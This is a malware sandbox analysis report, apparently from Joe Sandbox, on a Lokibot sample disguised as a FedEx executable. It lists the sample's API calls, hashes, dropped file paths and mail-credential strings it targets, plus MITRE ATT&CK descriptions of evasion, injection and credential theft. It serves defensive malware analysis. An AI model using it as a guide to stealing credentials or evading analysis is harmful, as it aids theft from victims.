
Download Yara Rule

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

EmailAddress, xrefs: 0040D074
Technology, xrefs: 0040D08D
SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
PopServer, xrefs: 0040D099
SmtpAccount, xrefs: 0040D0FA
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
SmtpPassword, xrefs: 0040D117

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2465400980.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_FedEx_776282383902.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FedEx_776282383902.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FedEx_776282383902.exe.log

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

Windows Analysis Report
FedEx_776282383902.exe

Function 06194748 Relevance: 2.8, Strings: 2, Instructions: 259
COMMON

Function 06194758 Relevance: 2.8, Strings: 2, Instructions: 256
COMMON

Function 06193BE8 Relevance: 2.7, Strings: 2, Instructions: 209
COMMON

Function 06193BF8 Relevance: 2.7, Strings: 2, Instructions: 206
COMMON

Function 012CD3A8 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Function 012CD3B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0619E1EC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Function 0619E1F8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre